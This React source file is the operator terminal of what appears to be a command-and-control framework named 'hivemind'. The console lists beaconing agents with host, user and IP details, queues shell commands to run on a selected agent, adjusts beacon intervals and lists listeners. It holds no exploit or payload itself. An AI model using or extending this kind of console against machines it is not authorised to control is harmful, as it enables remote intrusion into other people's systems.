import React, { useState, useEffect, useRef } from 'react';
import { useDispatch, useSelector } from 'react-redux';
import { fetchAgents } from '../store/agentsSlice';
import { executeShell, fetchTasks } from '../store/tasksSlice';
import api from '../services/api';

function Console() {
  const dispatch = useDispatch();
  const { agents } = useSelector((state) => state.agents);
  const [selectedAgent, setSelectedAgent] = useState(null);
  const [input, setInput] = useState('');
  const [history, setHistory] = useState([
    { type: 'system', content: '╔══════════════════════════════════════════════════════════════╗' },
    { type: 'system', content: '║  HDP - Analyst Console                                        ║' },
    { type: 'system', content: '║  Type "help" for available commands                          ║' },
    { type: 'system', content: '╚══════════════════════════════════════════════════════════════╝' },
    { type: 'info', content: '' },
  ]);
  const [commandHistory, setCommandHistory] = useState([]);
  const [historyIndex, setHistoryIndex] = useState(-1);
  const consoleEndRef = useRef(null);
  const inputRef = useRef(null);

  useEffect(() => {
    dispatch(fetchAgents());
  }, [dispatch]);

  useEffect(() => {
    consoleEndRef.current?.scrollIntoView({ behavior: 'smooth' });
  }, [history]);

  const addOutput = (content, type = 'output') => {
    setHistory(prev => [...prev, { type, content, timestamp: new Date() }]);
  };

  const processCommand = async (cmd) => {
    const parts = cmd.trim().split(/\s+/);
    const command = parts[0].toLowerCase();
    const args = parts.slice(1);

    switch (command) {
      case 'help':
        addOutput(`
Available Commands:
  agents              - List all connected agents
  use <agent_id>      - Select an agent to interact with
  info                - Show selected agent info
  shell <command>     - Execute shell command on selected agent
  tasks               - Show pending tasks for selected agent
  sleep <seconds>     - Set agent beacon interval
  clear               - Clear console
  exit                - Deselect current agent
  
System Commands:
  listeners           - List all listeners
  stats               - Show system statistics
  whoami              - Show current user
        `, 'info');
        break;

      case 'clear':
        setHistory([]);
        break;

      case 'agents':
        if (agents.length === 0) {
          addOutput('No agents connected.', 'warning');
        } else {
          const header = '  ID          HOSTNAME          IP                STATUS    OS';
          const separator = '  ─────────   ───────────────   ────────────────  ────────  ────────';
          addOutput(header, 'info');
          addOutput(separator, 'info');
          agents.forEach(agent => {
            const id = agent.agent_id?.substring(0, 8).padEnd(10);
            const hostname = (agent.hostname || 'Unknown').substring(0, 15).padEnd(18);
            const ip = (agent.external_ip || 'N/A').padEnd(18);
            const status = agent.is_online ? '●ONLINE ' : '○OFFLINE';
            const os = agent.os_type || 'Unknown';
            addOutput(`  ${id}${hostname}${ip}${status}  ${os}`, agent.is_online ? 'success' : 'muted');
          });
        }
        break;

      case 'use':
        if (!args[0]) {
          addOutput('Usage: use <agent_id>', 'error');
          break;
        }
        const agent = agents.find(a => a.agent_id.startsWith(args[0]));
        if (agent) {
          setSelectedAgent(agent);
          addOutput(`Selected agent: ${agent.hostname} (${agent.agent_id})`, 'success');
        } else {
          addOutput(`Agent not found: ${args[0]}`, 'error');
        }
        break;

      case 'info':
        if (!selectedAgent) {
          addOutput('No agent selected. Use "use <agent_id>" first.', 'error');
          break;
        }
        addOutput(`
Agent Information:
  ID:         ${selectedAgent.agent_id}
  Hostname:   ${selectedAgent.hostname}
  Username:   ${selectedAgent.username}
  OS:         ${selectedAgent.os_type} ${selectedAgent.os_version}
  Arch:       ${selectedAgent.architecture}
  Internal:   ${selectedAgent.internal_ip}
  External:   ${selectedAgent.external_ip}
  Country:    ${selectedAgent.country}
  Beacon:     ${selectedAgent.beacon_interval}s ± ${selectedAgent.jitter}%
  Status:     ${selectedAgent.is_online ? 'ONLINE' : 'OFFLINE'}
  Last Seen:  ${selectedAgent.last_seen}
        `, 'info');
        break;

      case 'shell':
        if (!selectedAgent) {
          addOutput('No agent selected. Use "use <agent_id>" first.', 'error');
          break;
        }
        if (args.length === 0) {
          addOutput('Usage: shell <command>', 'error');
          break;
        }
        const shellCmd = args.join(' ');
        addOutput(`Queuing command: ${shellCmd}`, 'info');
        try {
          await dispatch(executeShell({ agentId: selectedAgent.agent_id, command: shellCmd }));
          addOutput('Command queued. Will execute on next beacon.', 'success');
        } catch (error) {
          addOutput(`Error: ${error.message}`, 'error');
        }
        break;

      case 'tasks':
        if (!selectedAgent) {
          addOutput('No agent selected. Use "use <agent_id>" first.', 'error');
          break;
        }
        try {
          const tasksResponse = await api.get(`/tasks?agent_id=${selectedAgent.agent_id}`);
          const agentTasks = tasksResponse.data.tasks || [];
          if (agentTasks.length === 0) {
            addOutput('No tasks for this agent.', 'info');
          } else {
            const header = '  ID          TYPE        STATUS      COMMAND';
            const separator = '  ─────────   ──────────  ──────────  ────────────────────';
            addOutput(header, 'info');
            addOutput(separator, 'info');
            agentTasks.slice(0, 20).forEach(task => {
              const id = (task.task_id || '').substring(0, 8).padEnd(10);
              const type = (task.task_type || 'shell').padEnd(12);
              const status = (task.status || 'pending').padEnd(12);
              const cmd = (task.command || '').substring(0, 30);
              const style = task.status === 'completed' ? 'success' : 
                           task.status === 'failed' ? 'error' : 'muted';
              addOutput(`  ${id}${type}${status}${cmd}`, style);
            });
            if (agentTasks.length > 20) {
              addOutput(`  ... and ${agentTasks.length - 20} more tasks`, 'muted');
            }
          }
        } catch (error) {
          addOutput(`Error fetching tasks: ${error.message}`, 'error');
        }
        break;

      case 'sleep':
        if (!selectedAgent) {
          addOutput('No agent selected. Use "use <agent_id>" first.', 'error');
          break;
        }
        if (!args[0] || isNaN(parseInt(args[0]))) {
          addOutput('Usage: sleep <seconds>', 'error');
          break;
        }
        const sleepInterval = parseInt(args[0]);
        try {
          await api.put(`/agents/${selectedAgent.agent_id}`, { beacon_interval: sleepInterval });
          addOutput(`Beacon interval set to ${sleepInterval} seconds. Will apply on next beacon.`, 'success');
          // Update local state
          setSelectedAgent(prev => ({ ...prev, beacon_interval: sleepInterval }));
        } catch (error) {
          addOutput(`Error: ${error.message}`, 'error');
        }
        break;

      case 'listeners':
        try {
          const listenersResponse = await api.get('/listeners');
          const listenersList = listenersResponse.data.listeners || [];
          if (listenersList.length === 0) {
            addOutput('No listeners configured.', 'info');
          } else {
            const header = '  NAME          TYPE        PORT      STATUS';
            const separator = '  ────────────  ──────────  ────────  ──────────';
            addOutput(header, 'info');
            addOutput(separator, 'info');
            listenersList.forEach(listener => {
              const name = (listener.name || 'Unnamed').substring(0, 12).padEnd(14);
              const type = (listener.listener_type || 'http').padEnd(12);
              const port = String(listener.bind_port || '').padEnd(10);
              const status = listener.status || 'stopped';
              const style = status === 'running' ? 'success' : 'muted';
              addOutput(`  ${name}${type}${port}${status}`, style);
            });
          }
        } catch (error) {
          addOutput(`Error fetching listeners: ${error.message}`, 'error');
        }
        break;

      case 'exit':
        setSelectedAgent(null);
        addOutput('Agent deselected.', 'info');
        break;

      case 'whoami':
        addOutput('operator@hivemind', 'output');
        break;

      case 'stats':
        const online = agents.filter(a => a.is_online).length;
        addOutput(`
System Statistics:
  Total Agents:  ${agents.length}
  Online:        ${online}
  Offline:       ${agents.length - online}
        `, 'info');
        break;

      default:
        if (cmd.trim()) {
          addOutput(`Unknown command: ${command}. Type "help" for available commands.`, 'error');
        }
    }
  };

  const handleSubmit = async (e) => {
    e.preventDefault();
    if (!input.trim()) return;

    const prompt = selectedAgent 
      ? `(${selectedAgent.hostname})> ${input}`
      : `hivemind> ${input}`;
    
    addOutput(prompt, 'command');
    setCommandHistory(prev => [...prev, input]);
    setHistoryIndex(-1);
    
    await processCommand(input);
    setInput('');
  };

  const handleKeyDown = (e) => {
    if (e.key === 'ArrowUp') {
      e.preventDefault();
      if (commandHistory.length > 0) {
        const newIndex = historyIndex < commandHistory.length - 1 ? historyIndex + 1 : historyIndex;
        setHistoryIndex(newIndex);
        setInput(commandHistory[commandHistory.length - 1 - newIndex]);
      }
    } else if (e.key === 'ArrowDown') {
      e.preventDefault();
      if (historyIndex > 0) {
        const newIndex = historyIndex - 1;
        setHistoryIndex(newIndex);
        setInput(commandHistory[commandHistory.length - 1 - newIndex]);
      } else {
        setHistoryIndex(-1);
        setInput('');
      }
    }
  };

  const getLineStyle = (type) => {
    switch (type) {
      case 'command': return { color: 'var(--neon-green)' };
      case 'error': return { color: 'var(--neon-red)' };
      case 'warning': return { color: 'var(--neon-orange)' };
      case 'success': return { color: 'var(--neon-green)' };
      case 'info': return { color: 'var(--neon-cyan)' };
      case 'system': return { color: 'var(--neon-purple)' };
      case 'muted': return { color: 'var(--text-muted)' };
      default: return { color: 'var(--text-primary)' };
    }
  };

  return (
    <>
      <header className="main-header">
        <h1 className="page-title">Command Console</h1>
        <div className="header-actions">
          {selectedAgent && (
            <span style={{ color: 'var(--neon-green)' }}>
              Connected: {selectedAgent.hostname}
            </span>
          )}
        </div>
      </header>

      <div className="main-body" style={{ height: 'calc(100vh - 140px)' }}>
        <div 
          className="card" 
          style={{ height: '100%', display: 'flex', flexDirection: 'column' }}
          onClick={() => inputRef.current?.focus()}
        >
          <div className="card-header">
            <h3 className="card-title">Terminal</h3>
            <button 
              className="btn btn-sm btn-ghost"
              onClick={() => setHistory([])}
            >
              Clear
            </button>
          </div>
          <div 
            className="card-body" 
            style={{ 
              flex: 1, 
              overflow: 'auto', 
              background: 'var(--bg-primary)',
              fontFamily: 'var(--font-mono)',
              fontSize: '13px',
              lineHeight: '1.6',
              padding: 'var(--spacing-lg)'
            }}
          >
            {history.map((line, index) => (
              <div key={index} style={{ ...getLineStyle(line.type), whiteSpace: 'pre-wrap' }}>
                {line.content}
              </div>
            ))}
            
            <form onSubmit={handleSubmit} style={{ display: 'flex', marginTop: 'var(--spacing-sm)' }}>
              <span style={{ color: 'var(--neon-green)', marginRight: '8px' }}>
                {selectedAgent ? `(${selectedAgent.hostname})>` : 'hivemind>'}
              </span>
              <input
                ref={inputRef}
                type="text"
                value={input}
                onChange={(e) => setInput(e.target.value)}
                onKeyDown={handleKeyDown}
                style={{
                  flex: 1,
                  background: 'transparent',
                  border: 'none',
                  outline: 'none',
                  color: 'var(--text-primary)',
                  fontFamily: 'inherit',
                  fontSize: 'inherit'
                }}
                autoFocus
              />
            </form>
            <div ref={consoleEndRef} />
          </div>
        </div>
      </div>
    </>
  );
}

export default Console;
